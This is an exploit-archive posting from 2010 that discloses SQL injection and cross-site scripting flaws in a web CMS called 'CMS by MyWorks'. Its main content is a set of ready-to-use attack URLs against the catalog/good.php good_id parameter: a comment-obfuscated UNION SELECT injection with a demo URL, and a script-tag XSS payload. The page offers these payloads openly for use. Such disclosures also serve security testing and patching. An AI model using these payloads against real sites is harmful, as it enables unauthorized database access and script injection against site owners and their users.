CMS by MyWorks Multiple Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : CMS by MyWorks Multiple Vulnerabilities
# Published : 2010-03-01
# Author : Palyo34
# Previous Title : phptroubleticket (id) SQL Injection Vulnerability
# Next Title : Uiga Personal Portal index.php SQL Injection Vulnerability

CMS by MyWorks SQL/ XSS Vulnerability  
========================================================  
    
####################################################################  
# Author : Palyo34

# Home   : www.1923Turk.com 

# Script : CMS by MyWorks 
 
# Script site: http://www.myworks.spb.ru/                
    
####################################################################  
    
===[ Exploit ]===  
    
http://server/catalog/good.php?good_id= SQL INJECTION 
    
  1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12
  
Demo: 
  
http://server/catalog/good.php?good_id=1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12
  
     
###################################################################


===[XSS Vulnerability]=== 


http://server/catalog/good.php?good_id=


http://server/catalog/good.php?good_id=164<script>alert("XSS")</script>